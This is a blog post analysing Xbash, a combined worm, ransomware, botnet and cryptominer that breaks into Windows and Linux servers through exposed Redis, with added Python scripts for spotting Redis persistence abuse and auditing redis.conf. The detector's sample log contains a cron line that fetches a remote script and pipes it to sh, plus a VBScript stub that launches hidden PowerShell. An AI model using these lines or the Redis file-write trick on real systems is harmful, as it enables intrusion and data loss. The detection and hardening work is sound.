Recently discovered Xbash malware fits an emerging trend. It’s not just one type of malware, it’s at least four different types. It’s a worm! It’s ransomware! It’s a botnet! It’s a cryptominer! It slices and it dices, and it can be yours for four easy payments of two Bitcoins! Well, I haven’t seen infomercial-style ads on the Dark Web yet, nor have I seen Xbash for sale there. But you can catch my drift, eh?
It also targets both Windows and Linux. It’s not that there’s a Windows version and a Linux version… the same malware with the same payload will try different exploits and malicious activities based on whether the infected target is determined to be Windows or Linux. I use a Linux distro on my home office PC for my everyday work and leisure, but I’m an outlier. Rarely do consumers use Linux directly except perhaps for the Linux kernel on their Android devices. So targeting x86 versions of Linux suggests that the cyber attackers intend to focus on servers, including those which don’t run Windows Server. Attack Windows Server machines running applications like Active Directory and IIS, and attack Linux machines running applications like Apache, and you’ve got the large majority of internet servers around the world.
Originally developed in Python and then packaged into self-contained Linux ELF executables (the legitimate PyInstaller tool does the packaging), Xbash tries to infect a system by guessing weak passwords and exploiting well-known, unpatched vulnerabilities, such as those in Redis services, which run on both major platforms. Xbash appears to be under constant development, so the attackers' command and control servers may push updates designed to exploit new and different vulnerabilities in the future.
Researchers believe that the Iron Group, otherwise known as Rocke, is behind Xbash. Iron Group was originally discovered in 2017. The researchers wrote:
“Previously the Iron Group developed and spread cryptocurrency miners or cryptocurrency transaction hijacking trojans mainly intended for Microsoft Windows, with only a few for Linux. Instead, Xbash aimed on discovering unprotected services, deleting victim’s MySQL, PostgreSQL and MongoDB databases, and ransom for Bitcoins. Xbash uses three known vulnerabilities in Hadoop, Redis and ActiveMQ for self-propagation or infecting Windows systems.”
Xbash behaves like a persistent, actively maintained threat rather than a one-off campaign. The cyber attackers scan IP addresses on both the public internet and internal networks, probing for exposed services such as Redis, Hadoop, ActiveMQ and the database servers it wipes. Unlike Iron's previous attacks, making money from ransomware and cryptomining appears to be only one of several motives, and the others remain rather mysterious. The attackers really haven't made much money from Xbash so far, and that seems deliberate: the ransomware profits amount to only about $6,000 USD worth of Bitcoin. Researcher Jen Miller-Osborn said:
“We agree that it seems odd. Though there is no way for the victims to know the attackers did not create copies of their files to return (as it claims to). It’s only once they’ve paid, and the attackers don’t restore the files, that the victims know their files are truly gone. The attackers may be happy enough to make whatever profits they can without the added step of having to store, track, and return the data.”
Money is certainly a factor, but perhaps the lust for power is an even greater one. Look at what they can leverage with their command and control servers and their ever growing botnet!
Here's what Xbash does once it has decided that a target is a Windows machine. When it reaches a host through an exposed Redis instance, it looks at where the web server lives in the file system: a path typical of Windows, such as one under the Program Files folder, triggers the Windows branch. Xbash then abuses Redis to plant a Windows startup item, which downloads a malicious HTML or Scriptlet file from the command and control servers; the JavaScript or VBScript inside that file launches PowerShell, which in turn runs a malicious PE executable or PE DLL. Once thoroughly inside a Windows target, further code and instructions from the command and control servers make Xbash show its not-so-charming cryptomining and worm aspects.
If, by the same route through Redis, Xbash finds the web server in a location typical of Linux, such as under /usr/local/, Tux mode commences! (Only I seem to call it Tux mode. I apologize to penguins everywhere.) A Linux cron job is created that fetches a malicious shell script from the command and control servers and executes it. Xbash then looks for databases to delete, such as MySQL, PostgreSQL and MongoDB instances it can reach, and demands a Bitcoin ransom for their return. Note what that means for a victim: the data is deleted, not encrypted, so there is nothing the attackers could decrypt for you even if you paid, and a tested, offline backup is the only way to get it back. On a Linux system, Xbash goes on to show its equally not-so-charming ransomware and botnet aspects. Each and every side is utterly non-photogenic, darling.
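The cron-job and startup-item tricks described above both come down to the same move: an unauthenticated Redis instance is told where to write its dump file and what to name it, and is then forced to save, so the dump lands as a cron entry on Linux or an auto-run item on Windows. The following Python script is an added example (not code from the original post, from Comodo, or from the Xbash authors) that spots that sequence in the output of `redis-cli MONITOR`. The MONITOR lines, addresses and hostnames in it are constructed for illustration, and the directory and keyword lists are illustrative indicators rather than an exhaustive rule set.

```python
"""Spot Xbash-style Redis persistence abuse in `redis-cli MONITOR` output.

Added example, not code from the original post or from the Xbash authors.
The MONITOR lines, addresses and path lists below are constructed.
"""
import re
from collections import defaultdict

# MONITOR line format: [+]<unix time> [<db> <client ip:port>] "ARG" "ARG" ...
MONITOR_RE = re.compile(r'^\+?(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
_ESC = {"n": "\n", "r": "\r", "t": "\t"}
# Cron syntax: five schedule fields followed by a command.
CRON_RE = re.compile(r"^\s*(?:[\d*/,-]+\s+){5}\S", re.M)

# Where an attacker points `dir` so the saved dump becomes a cron entry (Linux)
# or an auto-run item (Windows). Illustrative, not exhaustive (assumption).
LINUX_PERSIST_DIRS = ("/var/spool/cron", "/etc/cron.d", "/root/.ssh")
WINDOWS_PERSIST_MARKERS = ("\\start menu\\programs\\startup", "\\program files")


def _unescape(s):
    """Undo MONITOR's backslash quoting of newlines, quotes and backslashes; \\xNN escapes are left as-is."""
    return re.sub(r"\\(.)", lambda m: _ESC.get(m.group(1), m.group(1)), s)


def parse_monitor_line(line):
    """Return {'ts', 'client', 'args'} for one MONITOR line, or None if it does not parse."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    return {"ts": float(m.group("ts")), "client": m.group("client"),
            "args": [_unescape(a) for a in ARG_RE.findall(m.group("args"))]}


def classify_dir(path):
    """'linux' or 'windows' if the dump directory is a persistence location, else None."""
    if not path:
        return None
    if any(path.startswith(p) for p in LINUX_PERSIST_DIRS):
        return "linux"
    low = path.lower()
    if re.match(r"[a-z]:\\", low) and any(mk in low for mk in WINDOWS_PERSIST_MARKERS):
        return "windows"
    return None


def looks_like_dropper(value):
    """True when a stored value reads like a cron line or a download-and-run stub."""
    return bool(CRON_RE.search(value) or re.search(r"curl|wget|powershell|<script", value, re.I))


def detect_persistence_writes(lines):
    """Per client: CONFIG SET dir/dbfilename -> SET <dropper> -> SAVE/BGSAVE means a file was planted."""
    state = defaultdict(lambda: {"dir": None, "dbfilename": "dump.rdb", "payload": False})
    findings = []
    for line in lines:
        ev = parse_monitor_line(line)
        if not ev or not ev["args"]:
            continue
        args, st = ev["args"], state[ev["client"]]
        cmd = args[0].upper()
        if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
            key = args[2].lower()
            if key in ("dir", "dbfilename"):
                st[key] = args[3]
        elif cmd in ("SET", "APPEND") and len(args) >= 3 and looks_like_dropper(args[2]):
            st["payload"] = True
        elif cmd in ("SAVE", "BGSAVE"):
            platform = classify_dir(st["dir"])
            if platform:
                sep = "/" if platform == "linux" else "\\"
                findings.append({"client": ev["client"], "platform": platform,
                                 "path": st["dir"].rstrip(sep) + sep + st["dbfilename"],
                                 "payload_seen": st["payload"]})
    return findings


# Constructed MONITOR capture: one Linux-style and one Windows-style planting, plus benign traffic.
SAMPLE_MONITOR = r'''
+1537113600.000123 [0 198.51.100.7:43210] "CONFIG" "SET" "dir" "/var/spool/cron"
+1537113600.000456 [0 198.51.100.7:43210] "CONFIG" "SET" "dbfilename" "root"
+1537113600.000789 [0 198.51.100.7:43210] "SET" "x" "\n*/1 * * * * curl -fsSL http://c2.invalid/x.sh | sh\n"
+1537113600.001000 [0 198.51.100.7:43210] "SAVE"
+1537113601.000000 [0 198.51.100.9:50000] "CONFIG" "SET" "dir" "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp"
+1537113601.000100 [0 198.51.100.9:50000] "CONFIG" "SET" "dbfilename" "update.hta"
+1537113601.000200 [0 198.51.100.9:50000] "SET" "y" "<script language=\"VBScript\">CreateObject(\"WScript.Shell\").Run \"powershell -nop -w hidden\"</script>"
+1537113601.000300 [0 198.51.100.9:50000] "BGSAVE"
+1537113602.000000 [0 10.0.0.5:60000] "GET" "session:abc"
+1537113602.500000 [0 10.0.0.6:60001] "CONFIG" "SET" "dir" "/var/lib/redis"
+1537113603.000000 [0 10.0.0.6:60001] "BGSAVE"
'''

if __name__ == "__main__":
    for f in detect_persistence_writes(SAMPLE_MONITOR.splitlines()):
        print(f"{f['client']}: {f['platform']} persistence write to {f['path']} "
              f"(payload seen: {f['payload_seen']})")
```

The state is kept per client because the three steps arrive as separate commands; a legitimate administrator who sets `dir` to `/var/lib/redis` and runs `BGSAVE` (the last client in the sample) produces no finding, while the two attacker clients are reported with the exact file they planted.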
So Xbash doesn't seem to be a pure gold digger, but it will inevitably try to exploit new vulnerabilities in the future and try a variety of other activities so that the Iron Group can keep internet servers around the world under its thumb. Whatever forms Xbash takes next, the defenses are unglamorous: use strong, unique passwords on your OSes, web servers and databases; install the latest patches for Redis, Hadoop, ActiveMQ and everything else you expose; keep database and management services such as Redis, MySQL, PostgreSQL and MongoDB off the public internet and behind authentication; and keep tested offline backups, because a wiped database cannot be decrypted back into existence. That will certainly make it harder for your network to become the latest Xbash victim.
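As an added example of the "keep exposed services locked down" advice, here is a small redis.conf audit in Python that checks for the settings an Xbash-style worm relies on: an instance bound to every interface, protected mode switched off, no or a guessable `requirepass`, and a reachable `CONFIG` command. It is not code from the original post or from the Redis project. The weak and hardened config fragments and the short weak-password list are constructed for illustration, and the audit covers only the handful of directives named in it.

```python
"""Audit a redis.conf for the exposure an Xbash-style worm needs.

Added example, not code from the original post or from the Redis project.
The config fragments and the weak-password list below are constructed.
"""
import re

# Illustrative sample of default / guessable passwords (assumption, not a full wordlist).
WEAK_PASSWORDS = {"redis", "password", "123456", "foobared", "admin", "changeme"}
ALL_INTERFACES = {"0.0.0.0", "::", "*", "-::*"}


def parse_redis_conf(text):
    """{directive: [value, ...]}; comments and blank lines skipped, repeats accumulate in order."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, _, rest = line.partition(" ")
        conf.setdefault(name.lower(), []).append(rest.strip())
    return conf


def audit_redis_conf(text):
    """Return a list of human-readable findings; an empty list means the checks passed."""
    conf = parse_redis_conf(text)
    findings = []

    # 1. Listening on every interface is how an internal cache ends up on the public internet.
    binds = " ".join(conf.get("bind", [])).split()
    if not binds or any(b in ALL_INTERFACES for b in binds):
        findings.append("bind: listens on all interfaces; bind to loopback or an internal address")

    # 2. protected-mode is the safety net for an unauthenticated instance; 'no' removes it.
    if conf.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append("protected-mode no: remote clients are accepted without authentication")

    # 3. No password, or a guessable one, is exactly the weak-password path Xbash brute-forces.
    pw = conf.get("requirepass", [""])[-1].strip('"')
    if not pw:
        findings.append("requirepass: missing; anyone who can reach the port has full control")
    elif pw.lower() in WEAK_PASSWORDS or len(pw) < 16:
        findings.append("requirepass: weak or short password")

    # 4. CONFIG SET dir/dbfilename + SAVE is the file-write primitive behind the cron/startup trick.
    #    Either rename CONFIG away (older releases) or deny it through an ACL rule (Redis 6+).
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    acl_blocks_config = any(re.search(r"-(?:@dangerous|@all|config)\b", u, re.I)
                            for u in conf.get("user", []))
    if "CONFIG" not in renamed and not acl_blocks_config:
        findings.append("CONFIG command reachable: an attacker can aim the dump file at any path")

    return findings


# Constructed sample: a near-default instance that ended up internet-facing.
WEAK_CONF = """\
port 6379
bind 0.0.0.0
protected-mode no
daemonize yes
dir /var/lib/redis
"""

# Constructed sample: the same instance after hardening.
HARDENED_CONF = """\
port 6379
bind 127.0.0.1 -::1
protected-mode yes
requirepass 7b2e0c5a8f3d4e6b9a1c2d3e4f5a6b7c
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
"""

if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{label}: {audit_redis_conf(text) or ['no findings']}")
```

Run it against `/etc/redis/redis.conf` on each host you own; the weak sample above reports all four problems and the hardened one none. Renaming `CONFIG` is a blunt instrument that also breaks legitimate tooling, so on Redis 6 and later an ACL rule that denies `@dangerous` to application users is the cleaner fix, and the audit accepts either.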
Tags: Is Xbash the Swiss Army Knife of Windows and Linux malware?,botnet ransomware,windows and linux,xbash malware